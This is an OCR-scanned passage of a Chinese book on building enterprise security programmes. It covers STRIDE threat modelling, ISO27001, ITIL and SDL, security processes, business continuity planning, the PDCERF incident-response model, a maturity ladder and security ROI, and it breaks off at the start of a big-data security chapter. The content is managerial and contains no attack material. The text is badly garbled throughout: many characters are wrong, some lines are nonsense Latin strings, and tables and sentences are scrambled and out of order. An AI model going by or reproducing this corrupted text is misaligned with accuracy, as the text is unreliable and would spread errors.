安全 标准 的 文档 ， 里 面 描述 了 访问 控制 、 输 入 验证 、 编 码 过 滤 、 认 证 鉴 
权 、 加 密 、 日 志 等 各 种 要 求 ， 久 而 久之 束 变 成 了 一 种 惯性 思维 ， 实 际 上 
之 所 以 要 这 么 做 是 因为 在 系统 设计 的 某 个 环节 存在 STRIDE 中 的 一 种 或 
几 种 风险 ， 所 以 在 那个 设计 关注 点 上 要 加 入 对 应 的 安全 措施 ， 并 不 是 在 
所 有 的 地 方 都 要 套用 全 部 的 或 千篇一律 的 安全 措施 。 人 否则 就 会 变 成 妨 外 
一 种 结果 :“ 过 度 的 安全 设计 ”。 威 胁 建 模 的 成 果 跟 工作 者 自身 的 知识 也 
有 很 大 的 关系 ， 有 攻防 经 验 的 人 比较 容易 判断 威胁 的 来 源 和 利用 场景 ， 
如 末 缺 少 这 方面 的 认 知 ， 可 能 会 发 现 到 处 是 风险 ， 有 些 风 险 的 利用 场景 
很 少 或 利用 条 件 非 常 苛刻 ， 如 宁 一 味 地 强调 风险 削减 措施 也 会 变 成 有 扣 
纸上谈兵 的 味道 ， 昌 然 从 安全 的 角度 没有 错 ， 但 从 产品 交付 的 整体 视角 
看 ， 安 全 还 是 做 过 头 了 。 








总 体 上 看 ，STRIDE 是 一 个 不 错 的 参考 视角 ， 即 便 有 丰富 攻防 经 验 
的 人 也 不 能 保证 自己 在 面 对 复 杂 系 统 的 安全 设计 时 考虑 是 全 面 的 ， 而 
STRIDE 则 有 助 于 风险 识别 的 履 盖 面 。 








以 上 的 例子 是 high level 的 威胁 建 模 ，low level 的 威胁 建 模 需要 画 了 
时 序 图 后 根据 具体 的 协议 和 数据 交互 进行 更 进一步 的 分 析 ， 细 节 可 以 参 
考 威胁 建 模 相关 的 方法 论 ， 但 不 管 是 high level 还 是 low level 都 比较 依赖 
于 分 析 者 自身 的 攻防 技能 。 











参考 资料 


威胁 建 模 : 使 用 STRIDE 方 法 发 现 安全 设计 缺陷 
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3.9 ”关于 ISO27001 


1. 重 建 对 安全 标准 的 认 知 


虽然 标题 用 了 ISO27001， 但 实际 上 这 里 可 以 指 代 所 有 的 安全 标准 和 
安全 理论 。 木 桶 理论 安全 界 的 人 都 知道 ， 但 用 到 实际 工作 中 ， 没 太 大 
用 ， 说 到 底 就 是 给 外 行 解释 安全 这 件 事 的 一 个 通俗 比喻 而 已 。 业 内 有 些 
声音 认为 安全 标准 堵 不 住 漏洞 ， 所 以 安全 标准 都 是 没 用 的 “废物 ”， 这 种 
论据 显然 是 有 问题 的 ， 首 先 安全 标准 的 制定 就 不 是 为 了 墙 漏洞， 所 以 安 
全 标准 跟 漏 洞 没 关系 ， 完 全 两 个 层面 的 东西 ， 不 能 拿 来 说 事 ， 堵 漏洞 有 
具体 的 技术 手段 ， 但 安全 建设 并 不 只 有 堵 漏 洞 这 种 微观 对 抗 。 

















那 安 全 标准 到 底 有 什么 用 ， 我 用 最 通俗 的 语言 解释 一 这， 安全 标准 
归根 结 底 是 为 了 给 你 一 个 参考 和 指引 ， 当 你 把 基础 的 技术 防护 手段 实施 
之 后 ， 过 了 上 任 之 初 的 救火 阶段 之 后 ， 惑 需要 停 下 来 思考 一 下 整个 企业 
安全 范畴 中 ， 哪 些 事情 是 短 板 ， 哪 些 领 域 尚且 空白 ， 需 要 在 哪些 点 上 继 
续 深 挖 才能 履 凑 公司 整体 的 安全 建设 ， 而 安全 标准 的 价值 就 是 告诉 你 ， 
在 安全 建设 的 领域 里 可 能 有 那么 100 件 事情 是 需要 做 的 ， 但 具体 选择 只 
做 80 件 还 是 99 件 还 是 100 件 全 做 是 你 自己 的 事情 ， 它 只 告诉 你 100 件 事情 
是 什 么 ， 但 是 这 100 件 事情 怎么 实现 ， 对 应 的 技术 方案 或 流程 是 什么 它 
不 会 告诉 你 ， 实 现 和 落地 是 需要 自己 去 想 的 ， 它 本 质 上 是 用 于 开拓 视 




















野 ， 跟 堵 不 堵 漏 洞 完全 没 冲 突 ， 换 句 话 说 它 古 一 本 书 的 目录 ， 但 对 于 每 
个 章节 怎么 写 则 取决 于 你 目 己 ， 你 可 以 买 WAF 也 可 以 加 固 容 器 ， 也 可 
以 像 俩 执 狂 一 样 地 做 代码 审计 ， 至 于 堵 漏 洞 那 只 是 每 个 章节 里 的 一 段 文 
字 而 已 。 











2. 最 实用 的 参考 





对 互联 网 公司 而 言 ， 我 认为 有 几 个 非常 刚 需 的 参考 : 





‘ITIL (BS15000/ISO20000) 一 一 绝 大 多 数 互联 网 公司 的 运 维 流程 
都 是 以 ITIL 为 骨架 建立 的 ， 甚 至 连 内 部 的 运 维 管理 平台 ， 监 控 系 统 上 都 
能 一 眼看 出 ITIL 的 特征 。 而 偏 运 维 侧 的 安全 ， 基 础 架构 与 网 络 安 全 ， 这 
部 分 的 安全 建设 是 以 运 维 活动 为 主干 ， 在 运 维 活动 上 添加 安全 环节 来 实 
现 安全 管理 的 。 所 以 想 在 运 维 侧 建立 安全 流程 必须 熟悉 ITIL， 把 安全 环 
节 衡 接 到 所 有 的 发 布 、 变 更 、 配 置 、 问 题 和 事件 管理 之 上 ， 而 不 是 打破 
原来 既 有 的 运 维 流程 ， 再 去 独创 一 个 什么 安全 流程 。 





'SDL 一 一 研发 侧 的 安全 管理 ， 绝 大 多 数 公司 都 借鉴 了 微软 的 SDL， 
即便 是 再 有 想法 的 甲 方 安全 团队 也 离 不 开 它 ， 所 以 无 论 如 何必 须 掌握 
SDL. 


.ISO27001 一 一 企业 安全 管理 领域 的 基础 性 安全 标准 ， 所 谓 基础 就 
是 不 能 比 这 个 更 加 精简 了 ， 你 可 以 不 碰 那 些 高 大 上 的 ， 但 是 ISO 27001 





则 相当 于 入 门 水 准 ， 束 好 像 高 等 数学 线性 代数 你 可 以 不 会 ， 但 是 如 果 你 
连 9x9 乘 法 表 都 背 不 出 来 ， 那 只 能 永远 呆 在 家 里 不 出 门 了 ， 因 为 你 连 买 
10 个 苹果 找 你 多 少 钱 都 算 不 来 。ISO 27001 总 体 上 提供 了 一 个 框架 性 的 
认 知 。 


3. 厂 泛 的 兼容 性 





学 习 攻 防 技术 和 学 习 少 数 几 个 国际 标准 一 点 都 不 冲突 ， 南 向 北向 都 
是 人 为 划分 的 ， 除 非 坐 地 画 圈 ， 否 则 完全 不 存在 这 种 天 然 障 碍 。 一 个 优 
秀 的 甲 方 工程 师 就 是 应 该 系统 化 又 熟悉 技术 细节 的 ， 对 于 开篇 提 到 的 
CSO 而 言 ， 没 有 视野 的 人 绝对 当 不 了 CSO。 











4. 局 限 性 


方法 论 的 作用 是 解决 企业 整体 安全 从 30 分 走 癌 50 分 的 问题 ， 这 个 阶 
段 需 要 具备 普 适 性 的 有 助 于 改善 基本 面 全 方位 提升 的 东西 。 但 是 到 了 中 
后 期 ， 这 些 就 不 太 管 用 了 ， 如 果 你 想 从 60 分 上 升 到 80 分 ， 不 能 再 依赖 于 
方法 论 ， 而 是 进入 安全 特性 改进 的 贴身 和 肉搏战 状态 ， 很 多 竞争 力也 许 只 
有 几 十 条 规则 ， 但 是 这 些 从 表面 上 是 看 不 出 来 的 ， 只 有 依靠 专业 人 士 的 
技能 和 资源 的 集中 投入 才能 有 所 产 出 。 








3.10 ”流程 与 “ 反 流 程 ” 


1. 人 的 问题 








在 传统 安全 领域 一 直 是 强调 流程 的 ， 但 是 互联 网 行业 有 一 点 反 流 
程 ， 甚 至 像 Facebook 这 样 的 公司 还 表示 除非 万 不 得 已 否则 不 会 新 建 一 条 
流程 来 解决 问题 。 那 安全 建设 到 底 要 不 要 流程 。 首 先 有 流程 肯定 能 解雇 
问题 ， 但 流程 化 是 不 是 最 佳 实践 则 不 确定 。 























于 是 先 解决 第 一 个 问题 ， 有 没有 可 能 没有 流程 ， 什 么 情况 下 可 能 很 
少 或 接近 于 没有 流程 。 假 如 公司 的 人 很 少 ， 从 工 位 上 站 起 来 就 能 看 到 全 
公司 的 人 ， 要 发 布 版 本 吼 一 嗓子 全 员 都 能 听 到 ， 这 种 情况 下 确实 不 需要 


什么 流程 ， 不 只 是 安全 流程 ， 其 他 的 流程 也 没 必要 。 


如 琳 组 织 比较 大 ， 单 纯 一 个 发 布 行为 会 涉及 很 多 跨 部 门 的 人 ， 其 至 
地 域 上 都 是 分 布 式 的 团队 ， 参 与 活动 的 人 员 行 为 即便 是 都 挂 在 公司 内 部 
的 IM 工 具 上 一 致 性 也 无 法 保证 ， 那 这 个 时 候 为 了 尽 可 能 规避 人 犯错 ， 
就 会 制定 一 些 流 程 。 随 着 组 织 越 来 越 大 ， 流 程 会 越 来 越 多 ， 并 且 流 程 大 
都 不 是 “进取 和 开放 ”型 的 ， 而 是 “错误 规避 ”型 的 ， 整 个 组 织 的 流程 都 会 
表现 为 在 茶 个 方向 上 高 度 优化 ， 从 而 进入 基因 诀 定 理论 的 影响 范畴 ， 流 
程 的 制作 者 为 了 保护 既 有 权益 ， 大 多 会 僵化 执行 流程 ， 开 始 走 向 自己 的 
有 反面。 作为 安全 负责 人 ， 必 须 周 期 性 地 审视 安全 和 本 治理 的 流程 是 不 是 














太 才 余 了 ， 是 否 可 以 精简 一 下 ， 或 者 在 公司 业务 扩张 、 新 建 业务 线 的 时 
候 考 虑 一 下 原 有 的 流程 是 否 适用 于 新 的 领域 。 如 条 安 全 负责 人 对 这 些 问 
题 比 较 漠视 ， 要 么 对 业务 不 敏感 ， 要 么 自身 提前 进入 不 受 激励 的 保 马 纱 
PRS T o 





2. 机 器 的 问题 


流程 是 用 来 解决 人 容易 犯错 的 问题 ， 而 不 是 用 来 解决 机 器 犯错 的 问 
题 ， 如 果 把 流程 用 于 解决 机 器 犯错 的 问题 那 就 会 闲 出 笑话 来 。 比 如 程序 
发 布 前 ， 需 要 有 一 个 安全 检查 的 环节 ， 如 条 不 约定 流程 ， 很 容易 漏 抒 ， 
这 是 在 解决 人 步骤 错误 的 问题 。 但 是 10000 合 机 需 打 同一 个 补丁 ， 有 
9990 台 都 打上 了 没 问 题 ， 剩 下 10 台 补丁 有 问题 ， 这 种 问题 应 该 通过 技术 
手段 解决 ， 而 不 是 通过 流程 来 解决 ， 如 何 让 系统 和 程序 返回 人 所 期 望 的 
结果 是 技术 需要 解决 的 问题 ， 跟 流程 没关系 ， 当 然 有 人 说 跟 程 序 的 执行 
流程 〈routine) 有 关系 ， 是 的 此 流程 非 彼 流程 。 通 过 人 为 的 流程 来 解 
决 ， 人 的 工作 会 越 来 越 多 ， 忙 于 救火 之 中 不 堪 重 负 ， 通 过 技术 途径 解 
决 ， 组 织 的 上 自动 化 程度 会 越 来 越 蜗 ， 和 生产力 会 越 来 越 强 ， 两 条 路 最 终 会 
使 团队 走 回 两 极 分 化 ， 选 哪 一 极 束 看 团队 的 基因 了 。 在 前 面 的 例子 中 为 
了 衡量 流程 的 执行 结果 ， 我 们 通常 会 引入 一 些 技 术 的 自动 化 手段 来 检 
测 ， 例 如 被 动 式 扫描 ， 有 些 开 发 和 运 维 漏 掉 安 全 审计 环节 直接 上 线 了 ， 
也 能 把 这 些 程序 的 URL 找 到 抓 下 来 扫 ， 当 然 它 并 不 能 瞪 代 流程 本 身 的 作 
用 。 











3.11 业务 持续 性 管理 





业务 持续 性 管理 (BCM) 是 一 个 较 高 层次 的 管理 机 制 ， 通 常 对 应 
到 公司 层面 ， 它 使 企业 认识 到 潜在 的 危机 和 相关 影响 ， 制 订 响应 、 业 务 
和 连续 性 的 恢复 计划 ， 其 总 体 目标 在 于 提高 企业 的 风险 防范 能 力 ， 有 效 
地 响应 非 计 划 的 业务 破坏 并 降低 不 良 影响 。 以 2015 年 中 国 互联 网 行业 的 
标志 性 事件 为 例 ， 网 易 、 携 程 、 支 付 宝 先后 发 生 大 规模 服务 中 断 ， 这 个 
问题 就 是 业务 持续 性 管理 的 场景 。 





BCM 的 全 生命 周期 方法 论 如 图 3-4 所 示 ， 其 中 BIA (Business Impact 
Analysis， 业 务 影 响 分 析 ) ~ Recovery Strategy (恢复 策略 )， 实 施 以 及 
测试 和 演练 都 是 很 重要 的 环节 。BIA 的 例子 ， 如果 QQ 的 数据 库 被 拖 库 了 
对 腾讯 有 什么 影响 ， 如 果 支 付 宝 被 拖 库 了 对 阿里 有 什么 影响 ?这 两 个 问 
题 可 能 有 点 极端 ， 再 举 几 个 可 能 性 更 大 一 点 的 : 如果 公司 官网 遭受 
DDoS 攻击 ， 流 量 一 度 超 过 防御 的 最 大 值 会 有 什么 影响 ”如 果 公 司 一 个 
主 站 页 面 被 挂 了 马 会 有 什么 影响 ?” 好 像 这 些 问 题 都 比较 头疼 ， 再 举 一 个 
轻微 一 点 的 ， 如 果 一 个 客服 的 论坛 账号 被 次 了 会 有 什么 影响 ， 尽 管 这 个 
问题 在 入 侵 者 那里 可 能 会 玩 成 蝴蝶 效应 ， 甚 至 变 成 APT， 但 是 一 般 情 况 
下 这 个 还 是 比 之 前 的 例子 要 轻微 得 多 ， 不 能 getshell 的 话 ， 改 一 下 口令 就 
完事 了 。 从 这 里 也 可 以 看 出 BIA 跟 基于 资产 权重 的 风险 管理 方法 论 类 
似 ， 跟 威胁 建 模 也 有 点 异曲同工 的 味道 ， 只 不 过 威胁 建 模 关注 的 是 有 具体 

















的 系统 ， 而 BIA 关 注 的 是 公司 的 业务 。 





图 3-4 BCM 的 生命 周期 


对 于 风 控 策略 ， 大 多 数 人 会 想到 DB 审计 ， 纵 深 防御 OS 防护 ， 应 用 
层 防 止 SQL 注 入 ， 部 署 WAF 等 ， 这 些 东 西 原先 放 在 安全 体系 里 “貌似 ” 完 
整 ， 而 如 今 放 到 BCM 里 一 下 子 就 不 完整 了 ， 为 什么 ? 显然 你 仍然 没有 
回答 上 述 问题 : 假如 被 拖 库 了 怎么 办 。 有 的 人 认为 管理 是 无 用 的 ， 
BCM 也 无 助 于 降低 程序 的 安全 漏洞 率 ， 但 是 只 会 攻防 ， 只 会 墙 洞 显然 
也 解决 不 了 企业 安全 中 的 那 许 许多 多 问题 。 这 个 问题 很 现实 ， 作 为 安全 
负责 人 ， 老 板 一 定 会 问 你 假如 被 拖 库 了 怎么 人 办， 有 人 会 说 “我 引 千 酬 


职 "， 这 样 的 回答 似乎 很 有 责任 感 ， 














么 ， 公 司 都 快 震 了 ， 你 走 人 了 ? ” 


但 对 面 的 人 可 能 就 会 想 


: “你 是 骗子 


一 个 典型 的 BCP (Business Continuity Plan〉 如 表 3-2 所 示 。 


表 3-2 ”典型 的 BCP 示 例 




















业务 持续 性 计划 灾难 恢复 业务 恢复 业务 继续 持续 性 规划 
目标 关键 电脑 、 应 用 。 | ”关键 业务 流程 流程 还 原 流程 变通 方案 
聚焦 数据 恢复 流程 恢复 返回 正常 状态 将 就 使 用 
示例 事件 大 型 机 故障 实验 室 泛 建筑 物 火灾 应 用 丢失 
解决 方案 热 备份 站 点 恢复 | MFAT 新 的 装备 和 建筑 物 | 使 用 手工 流程 
这 里 面 定 义 了 一 系列 的 视角 维度 和 与 之 对 应 的 措施 ， 不 具体 展开 


了 ， 对 于 安全 团队 而 言 ， 通 


全 事件 发 生 后 的 应 急 预 案 。 应 急 预 案 不 只 是 纸 面 上 的 流程 ， 
系列 的 技术 性 措施 ， 例 如 你 的 账号 保护 体系 。 
感 理 论 派 的 原因 是 只 制定 纸 面 的 策略 ， 





要 根据 公司 所 有 的 业务 简单 做 BIA， 然 
后 根据 所 有 的 IT 资产 权重 分 类 分 级 ， 并 制定 对 应 的 保护 策略 以 及 关键 安 


还 包括 了 一 


现实 生活 中 有 的 人 比较 反 


而 忽略 技术 环节 的 PDCA， 不 关 





注 如 何 优 化 纵深 防御 来 缓解 保护 失效 后 持续 缩小 攻击 面 和 影响 面 的 问 
题 ， 不 关注 阻 断 kill chain， 不 重视 安全 事件 发 生 后 的 应 急 体 系 工具 建 


设 ， 以 及 关键 系统 的 功能 中 是 否 文 持 有 损 服务 策略 等 ， 








技术 派 认 为 管理 是 无 用 的 ， 甚 至 连 安全 标准 都 背 了 黑 锅 ， 
罪 的 ，BCM 是 好 东西 。 


这 些 问题 导致 了 
其 实 标准 是 无 


项 目 治理 / 项 目 管 理 


WERE 
See! 活动 /程序 开发 


危机 管理 / 应 急 响 应 
sala raen 
施 ) 恢复 恢复 WE) 恢复 (CAG 持续 
sila mean 


图 3-5 ”德勤 的 BCM 方 法 论 实 施 路 径 





图 3-5 是 德勤 的 BCM 方 法 论 实施 路 径 图 ， 更 多 关于 BCM 的 内 容 可 以 
上 网 自己 搜索 这 里 不 继续 展开 了 。 


参考 资料 


“德勤 业务 连续 性 计划 和 管理 ”(http:/www.davislogic.com/bcm.htm 
Ja 


3.12 ”关于 应 急 啊 应 





很 多 人 认为 应 急 响 应 就 是 SSH 连 上 被 黑 的 机 器 去 查 rootkit， 直 到 今 
天 我 也 基本 不 漏 读 那 些 思路 清晰 的 入 侵 分 析 的 paper， 只 不 过 工程 师 关 
注 的 跟 CSO 关 注 的 还 是 有 些 不 一 样 。10 年 前 ， 我 是 乙方 工程 师 时 去 客户 
机 器 上 查 后 门 ， 虽 然 没 有 犯 过 明显 的 大 错误 ， 但 有 时 候 还 是 很 怕 把 系统 
搞 垮 了 ， 毕 竞 人 家 也 没 备份 数据 ， 所 以 总 归心 里 不 上 踏实。 如果 你 在 SRC 
接 到 和 白 帽 子 报 漏洞 ， 打 开 一 看 人 已 经 入 侵 到 系统 了 ， 然 后 就 突然 心里 一 
沉 ， 慌 慌张 张 就 要 了 个 root 账 号 SSH 连 上 去 了 ， 这 种 状态 其 实 很 不 好 ， 
搞 不 好 反 添 乱 ， 一 个 不 小 心 就 发 生 了 点 小 意外 把 什么 东西 搞 挂 了 ， 然 后 
英名 其 名 自己 就 变 成 罪 持 祸首 了 。 
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紧急 事件 检测 | 初始 响应 事件 分 级 
. 防火 墙 日 志 . 初步 判定 事件 类 型 、 | . 决定 什么 对 自己 最 
. 系统 日 志 定义 事件 级 别 重要 

.Web 服务 器 日 志 . 准备 相关 资源 MD . 为 紧急 事件 确定 优 
“IDS 日 志 . 为 紧急 事件 的 处 理 取 先 级 ， 更 有 效 的 利 
. 可 疑 的 用 户 得 管理 方面 的 支持 用 资源 
.管理 员 报告 + 组 建 事 件 处 理 小 组 .不 是 每 个 紧急 事件 

. 制定 安全 事件 响应 策略 都 需要 平等 对 竺 














调查 ” “事件 起 因 分 析 
“事件 取证 追查 
. 系统 后 门 检查 、 漏 洞 分 析 
* 数据 收集 、 数 据 分 析 


图 3-6 ”应 急 啊 应 的 PDCERF 模 型 





应 急 响 应 有 一 个 PDCERF 模 型 (也 可 以 参考 NIST SP800-61) ， 如 图 
3-6 所 示 。 简 单 说 来 就 是 一 连 串 步骤 。P 是 指 Preparation (准备 ) ， 之 前 
要 做 各 种 准备 工具 ， 具 体 一 点 的 比如 应 急 工具 : 静态 编译 的 ]s、 
ifconfig、ps 等 总 归 是 要 事前 准备 好 。D 是 指 Detection 〈 诊 断 ) ， 初 步 诊 
断 发 生 了 什么 类 型 的 问题 ， 以 助 于 后 续 工 作 展开 ， 同 样 是 大 规模 流量 ， 
L4 DDoS，CC 还 是 蠕虫 爆发 ， 对 应 的 应 急 手段 不 一 样 。C 是 指 
Containment (HED ， 这 是 被 大 多 数 人 忽略 的 一 步 ， 首 先 应 该 是 抑制 受 
害 范 围 ， 隔 离 使 受害 面 不 继续 扩大 ， 再 追求 根治 ， 而 不 是 一 边 任 其 蔓 

， 一 边 去 查 后 门 ， 到 头 来 你 查 完 这 台 机 器 ， 入 侵 者 在 这 时 间 档 里 又 搞 








到 了 另外 两 台 ， 然 后 你 就 干 瞪眼 吧 。 这 跟 ITIL 的 思路 是 一 样 的 ， 问 题 发 
生 时 首先 是 用 事件 管理 以 平息 事件 ， 恢 复 SLA 为 目标 ， 至 于 到 底 是 什么 
原因 可 以 先 放 一 放 ， 等 恢复 服务 了 ， 再 用 问题 管理 来 解决 根 因 的 事情 。 
接 下 来 就 是 大 多 数 人 最 熟悉 的 那 一 步 ，E 是 指 Eradication (ABR) ， 寻 
找 根 因 ， 封 堵 攻 击 源 。R 是 指 Recovery (WK) ， 把 业务 恢复 至 正常 水 
平 。 最 后 ，F 是 指 follow-up GREK) ， 监 控 有 无 异常 ， 报 告 ， 管 理 环节 
的 自省 和 改进 措施 ， 现 在 俗称 安全 运营 的 持续 改进 环节 。 

















ITSM 的 思路 员 罕 于 企业 安全 建设 的 方方面面 ， 了 解 攻防 技术 只 是 
说 你 具备 了 参与 企业 安全 建设 的 技术 理论 基础 ， 但 并 不 代表 你 具备 了 企 
业 安 全 建设 的 正确 方法 。 之 前 说 到 抑制 的 环节 ， 首 先 要 了 解 业务 、 数 气 
流 、 各 服务 接口 调用 关系 ， 这 些 都 是 日 常 的 积累 ， 人 否则 随便 一 个 隔离 又 
把 什么 服务 搞 挂 了 。 上 反 过 来 倒 推 ， 如 果 安 全 团队 平时 连 个 数据 流 图 都 没 
有 的 ， 发 现 单 点 出 现 问题 症状 时 大 致 的 系统 间 影 响 和 潜在 的 最 大 受害 范 
围 都 估计 不 出 来 的 ， 那 安全 建设 即便 是 救火 也 肯定 是 一 团 糟 啦 。 





3.13 ZA ERTEAN 


可 按照 < 马 斯 洛 需 求 ”层次 来 描述 安全 建设 的 需求 ， 如 图 3-7 所 示 。 
其 实 这 张 图 里 少 了 一 个 级 别 ， 束 是 LV0， 即 没有 安全 措施 。 


LV1 通 过 一 些 较为 基础 的 安全 措施 做 到 了 基础 的 访问 控制 ， 并 且 交 
付 的 系统 不 含有 明显 的 高 危 漏 洞 。 但 对 于 复杂 的 安全 事件 自身 没有 独立 
处 理 的 能 力 ， 必 须 依赖 于 外 部 厂商 。 











LV2 有 专职 的 安全 团队 ， 有 攻防 技术 能 力 ， 能 做 到 有 火 必 救 ， 不 依 
赖 于 外 部 广 商 。 但 在 安全 建设 上 缺乏 思路 ， 大 多 依赖 商业 产品 或 照搬 已 
有 的 安全 模式 。 





LV3 安 全 建设 呈现 初步 的 系统 化 ， 履 盖 全 生命 周期 ， 开 发 和 运 维 环 
市 都 有 必要 的 控制 流程 ， 主 要 的 系统 在 染 构 上 都 会 考虑 安全 方 采 ， 检 测 
和 防护 手段 能 因地制宜 。 


LV4 除 了 基础 娘 构 ， 应 用 ， 数 据 等 技术 层面 安全 能 做 到 全 生命 周期 
系统 化 建设 ， 业 务 层面 的 安全 问题 也 有 系统 化 解决 方案 。 安 全 此 时 不 只 
关注 技术 层面 的 攻防 对 抗 ， 也 关注 业务 形式 的 安全 以 及 黑 产 的 对 抗 。 


LV5 安 全 建设 进入 最 佳 实 践 阶段 ， 不 依赖 于 现 有 的 安全 机 制 ， 也 不 


依赖 于 厂商 的 安全 产品 ， 昌 说 自己 造 轮子 不 代表 最 佳 实践 ， 不 过 对 于 互 
联网 公司 攻防 和 业务 层面 的 安全 问题 ， 如 果 想 做 的 好 一 点 ， 不 目 己 发 明 
轮子 似乎 不 太 可 能 ， 至 少 现在 市 场 上 缺少 很 多 针对 互联 网 的 解决 方案 。 
在 这 个 阶段 ， 严 重 的 安全 事件 几乎 很 少 有 发 生 ， 大 多 数 精力 都 会 用 于 优化 
现 有 系统 的 检测 和 拦截 率 。 











LV1 自己 认为 自己 是 安全 的 
评价 标准 : 做 过 渗透 测试 ， 交 
付 的 代码 没有 高 危 的 漏洞 


© 






LV2 救火 的 能 力 
© 评价 标准 : 有 攻防 团队 ， 有 基 
本 的 入 侵 检测 能 力 


LV3 安全 体系 化 
J) 评价 标准 : 接近 完整 的 纵深 防 
御 体 系 ， 覆 盖 人 侵 检 测 和 防护 










安全 建设 的 
“ 马 斯 洛 需求 ” 





LV4 业务 层面 安全 得 到 满足 
评价 标准 : 账号 等 基础 服务 都 


D 有 安全 风 控 措施 


©) LV5 用 先进 的 方式 实践 安全 

©) 评价 标准 : 完整 的 纵深 防御 ， 
高 度 自动 化 ， 大 数据 和 机 器 学 
习 ， 精 确 对 搞 


图 3-7 ”安全 建设 的 “ 马 斯 洛 需求 ”层次 





3.14 TCO 和 ROI 


企业 安全 建设 本 质 上 不 是 一 个 可 以 通过 完全 量化 的 指标 来 衡量 建设 
得 好 与 坏 以 及 能 力 成 熟 度 的 事情 。 安 全 是 一 个 永 无 止境 的 投入 ， 永 远 都 
没有 办 法 提出 一 个 清单 ， 说 这 里 面 的 条 目 你 都 做 到 了 ， 安 全 就 很 好 了 。 
也 是 为 什么 等 级 保护 、ISO27001、PCI-DSS 这 类 企业 认证 可 以 用 来 装 
点 “门面 ?， 在 广告 、 营 销 、 融 资 、 上 市 公司 内 控 等 环节 告诉 公众 自己 是 
有 那么 一 点 安全 能 力 的 ， 但 是 永远 都 不 可 能 说 我 是 无 懈 可 击 。 某 些 老板 
在 台 上 走秀 时 吹牛 的 情节 请 自动 忽略 。 安 全 建设 的 好 坏 不 只 是 依赖 于 安 
全 团队 的 强 弱 ， 还 跟 安 全 建设 本 喘 所 消耗 的 金钱 和 资源 有 关 ， 大 多 数 企 
WBA ELBA AB], SY FRESE BOR A ee ABR HUGE ARE, MLE 
最 佳 实践 可 以 是 安全 团队 自己 的 追求 ， 但 不 是 安全 团队 工作 成 果 的 评价 
标准 ， 因 为 现实 中 不 可 能 消耗 那么 多 钱 用 于 安全 建设 ， 而 一 定 是 根据 企 
业 所 处 的 阶段 投入 到 应 景 的 程度 适可而止 ， 如 果 这 个 时 候 某 些 砖 家 一 定 
要 拿 什 么 能 力 成 熟 度 模型 来 评估 ， 说 结果 不 好 看 ， 你 可 以 很 理直气壮 的 
告诉 对 方 从 现实 的 角度 出 发 无 可 厚 非 ， 什 么 阶段 就 是 应 该 做 什么 事 ， 拿 
个 互联 网 行业 千 亿 美金 市 值 的 公司 来 “ 套 ” 大 多 数 公 司 纯 属 无 脑 行为 。 





























可 用 于 评价 安全 建设 做 的 好 与 坏 的 唯一 标准 就 是 ROI， 用 什么 样 资 
源 (TCO) 产 出 什么 样 的 安全 效果 。 能 力 平庸 的 CSO 可 能 建 了 很 大 的 安 
全 团队 也 还 是 频 出 安全 事件 ， 团 队 中 不 乏 张 口 就 是 “七 分 管理 ， 三 分 技 





术 ” 的 那 类 人 ， 而 面 问 实 操 干 活 的 人 却 是 少数 且 没 有 地 位 的 工程 师 ， 即 
便 有 学 习 能 力 不 错 的 工程 师 也 没 法 系统 化 的 组 织 他 们 的 工作 ， 任 其 目 生 
和 目 灭 。 还 有 的 公司 不 缺 王 将， 但 是 招 了 牛人 却 只 做 救火 之 用 ， 到 头 来 的 
产 出 和 一 文 没 有 牛人 的 团队 相差 无 几 。 思 路 清晰 的 CSO 即 便 上 自己 不 充当 
工程 师 的 角色 ， 也 能 以 一 支 精 锐 小 团队 歼 盖 企业 中 绝 大 多 数 安全 环节 。 











在 互联 网 公司 ， 安 全 负责 人 最 可 能 影响 ROI 的 几 个 因素 如 下 : 


-缺少 系统 化 药 图 ， 对 安全 建设 的 全 局 以 及 分 解 后 的 轻重 没有 感性 
认 知 ， 这 是 最 可 能 导致 头痛 医 头 脚 痛 医 脚 的 原因 。 


“对 管理 体系 和 工具 链 建 设 没 有 整体 认 知 ， 选 择 在 错误 的 时 间 扣 做 
正确 的 事 。 


把 安全 工作 当成 checklist 而 不 是 风险 管理 工作 ， 几 事 要 求 绝 对 安全 
而 不 能 接受 相对 风险 ， 对 下 属 求全 员 备 ， 大 概 只 有 外 星人 能 满足 这 种 需 
求 。 


弱 于 判断 安全 建设 在 实践 环节 的 好 与 坏 ， 搞 不 清楚 东 个 安全 机 制 
在 业界 属于 落后 水 平 ， 平 均 水 平 ， 还 是 领先 水 平 ， 以 及 东 种 安全 机 制 对 
于 削减 条 类 风险 的 作用 强 弱 ， 容 易 被 执行 者 忽悠 。 带 来 的 结果 束 是 貌似 
很 百 很 努力 ， 但 收效 甚 微 。 





个 人 的 职场 步调 与 公司 发 展 的 阶段 不 一 致 ， 公 司 处 于 快速 扩张 时 


期 ， 而 安全 负责 人 本 人 则 采取 保守 谨慎 的 胰 略 。 


只 务 内 勤 ， 不 管 外 联 ， 不 重视 生态 关系 建设 。 最 后 导致 小 问题 ， 


作为 一 个 风险 管理 型 的 角色 ， 而 不 是 直接 产生 利润 的 职能 ， 其 管理 
问 上 沟通 可 能 会 有 一 定 的 难度 ， 在 风险 取舍 方面 跟 上 下 左右 达成 一 致 也 


Fat ”业界 的 模糊 地 带 





安全 在 当下 有 一 定 的 热度 ， 业 界 处 于 一 种 声音 喷 杂 的 状态 ， 概 念 、 
名 词 很 多 ， 给 产业 提供 了 新 思路 和 新 方向 ， 但 同时 也 误导 人 。 尤 其 是 新 
手 ， 基 本 功 还 没 做 好 束 被 新 概念 带 着 跑 了 ， 结 果 都 以 为 自己 在 用 很 新 的 
概念 做 很 前 沿 的 事情 ， 实 际 上 可 能 地 基 都 没 建 好 就 开始 玩 智 慧 城市 了 。 
本 章 将 介绍 大 数据 安全 中 的 一 些 概念 ， 以 及 解决 方案 的 争议 。 








41 关于 大 数据 安全 


业界 对 大 数据 安全 的 讨论 铺天盖地 《如 图 4-1 所 示 ) ， 但 这 个 概念 
在 很 多 人 的 理解 中 可 能 是 混乱 和 错位 的 。 大 数据 安全 映射 到 一 个 很 大 的 
概念 ， 而 不 能 直接 对 应 到 具体 的 事情 上 ， 你 天 直接 说 大 数据 安全 ， 对 方 
往往 不 能 在 第 一 时 间 明 白 你 所 要 表达 的 意思 。 





1. 大 数据 安全 的 分 类 


第 一 类 : 关于 现今 流行 的 以 Hadoop 为 生态 的 离线 数据 处 理 大 数据 架 
构 和 以 Storm 为 生态 的 流 式 计算 大 数据 架构 ， 对 于 这 些 技术 方案 所 涉及 
的 安全 风险 ， 例 如 Hadoop 的 认证 ， 数 据 的 加 密 问题 ， 也 即 企 业 在 部 署 
